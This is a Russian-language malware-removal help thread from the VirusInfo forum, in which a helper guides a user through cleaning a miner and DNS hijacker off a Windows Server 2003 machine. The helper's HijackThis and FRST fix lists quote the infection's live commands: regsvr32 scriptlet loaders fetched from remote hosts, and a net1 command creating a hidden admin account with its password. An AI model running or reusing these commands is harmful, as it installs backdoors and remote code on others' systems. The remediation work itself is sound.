Показано с 1 по 8 из 8.

Не удаляется JS.FTP1202.SITE, прошу помощи (заявка № 224162)

  1. #1
    Junior Member Репутация
    Регистрация
    16.04.2008
    Сообщений
    10
    Вес репутации
    59

    Не удаляется JS.FTP1202.SITE, прошу помощи

    Здравствуйте! Компьютер заразился майнером (и, похоже, еще DNS-change'ром), помогите, пожалуйста избавиться.
    Вложения Вложения
    Последний раз редактировалось Thinker; 13.12.2019 в 20:44.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,285
    Вес репутации
    377
    Уважаемый(ая) Thinker, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,454
    Вес репутации
    1057
    На DHCP замените DNS 223.5.5.5 на другой - провайдерский, Яндекс.

    Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)пофиксите только эти строки:
    Код:
    O4 - HKLM\..\Run: [start] = C:\WINDOWS\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll
    O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2019/12/12) - {f7d9f5cf-0dd5-48fc-95ff-c6d7ecae6bea} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
    O17 - HKLM\System\CCS\Services\Tcpip\..\{17266C7B-F506-4E68-8003-80CC4F8203A0}: [NameServer] = 223.5.5.5
    O17 - HKLM\System\ControlSet002\Services\Tcpip\..\{17266C7B-F506-4E68-8003-80CC4F8203A0}: [NameServer] = 223.5.5.5
    Перезагрузите сервер.

    Не выставляйте в интернет свою инфраструктуру, множество открытых портов, в т. ч. относящихся к Windows, а версия сервера 2003 давно не поддерживается.

    Выполните скрипт в AVZ при наличии доступа в интернет:
    Код:
    var
    LogPath : string;
    ScriptPath : string;
    
    begin
     LogPath := GetAVZDirectory + 'log\avz_log.txt';
     if FileExists(LogPath) Then DeleteFile(LogPath);
     ScriptPath := GetAVZDirectory +'ScanVuln.txt';
    
      if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
        if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
           ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
           exit;
          end;
      end;
     if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
    end.
    После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    16.04.2008
    Сообщений
    10
    Вес репутации
    59
    Благодарю за ответ, адрес заменен, прилагаю требуемые файлы.
    Вложения Вложения
    • Тип файла: zip avz_log.zip (277 байт, 3 просмотров)
    • Тип файла: zip Frst.zip (13.8 Кб, 2 просмотров)

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,454
    Вес репутации
    1057
    Содержимое папки C:\ownno известно?

    information

    Уведомление

    Загрузите систему в безопасном режиме


    Выделите и скопируйте в буфер обмена следующий код:
    Код:
    Start::
    "iGjh" => service could not be unlocked. <==== ATTENTION
    HKLM\SYSTEM\ControlSet001\Services\iGjh => cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&regsvr32 /s /u /n /i:http://78.142.194.116:8016/blue.txt scrobj.dll <==== ATTENTION (Rootkit!/Locked Service)
    "uti3ndu1" => service could not be unlocked. <==== ATTENTION
    HKLM\SYSTEM\ControlSet001\Services\uti3ndu1 => \??\C:\WINDOWS\system32\Drivers\uti3ndu1.sys <==== ATTENTION (Rootkit!/Locked Service)
    ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => c:\Program Files\Malwarebytes' Anti-Malware\mbamext.dll -> No File
    ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => c:\Program Files\Malwarebytes' Anti-Malware\mbamext.dll -> No File
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckyoumm4\"",Filter="__EventFilter.Name=\"fuckyoumm3\":: <==== ATTENTION
    Reboot:
    End::
    Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Установите Service Pack 2 для Windows 2003
    Затем все остальные обновления.

    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    16.04.2008
    Сообщений
    10
    Вес репутации
    59
    "ownno" - файл в корне, размер 0, до заражения вроде не было

    fixlog.txt прикрепляю. Прочитав содержимое, от дальнейших шагов из предыдущего сообщения пока воздержался (на всякий случай, если вдруг потребуется сначала еще что-то сделать).
    Вложения Вложения
    • Тип файла: 7z Fixlog.7z (1,018 байт, 1 просмотров)

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,454
    Вес репутации
    1057
    Без обновления система остаётся крайне уязвимой.
    И снаружи ничего не закрыли, ждите рецидива.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    16.04.2008
    Сообщений
    10
    Вес репутации
    59
    Когда я писал, что воздержался от дальнейших шагов, я имел ввиду, только до вашего ответа (на случай, если вдруг, по результатам fixlog, понадобится что-то еще сделать, до установки обновлений)

    - - - - -Добавлено - - - - -

    Цитата Сообщение от Vvvyg Посмотреть сообщение
    И снаружи ничего не закрыли, ждите рецидива.
    Можете написать номера 1-2 открытых портов для примера? Возможно, это было временно

Похожие темы

  1. Ответов: 9
    Последнее сообщение: 03.11.2015, 20:14
  2. Ответов: 2
    Последнее сообщение: 28.09.2014, 13:58
  3. Не удаляется папка, прошу помощи!
    От zakkman в разделе Microsoft Windows
    Ответов: 4
    Последнее сообщение: 11.09.2010, 22:33
  4. Не удаляется twex.exe. Прошу помощи
    От asmolenko в разделе Помогите!
    Ответов: 3
    Последнее сообщение: 07.02.2009, 21:27
  5. Сетевой червь не удаляется,прошу помощи
    От Saint в разделе Помогите!
    Ответов: 11
    Последнее сообщение: 20.01.2009, 18:34

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01091 seconds with 18 queries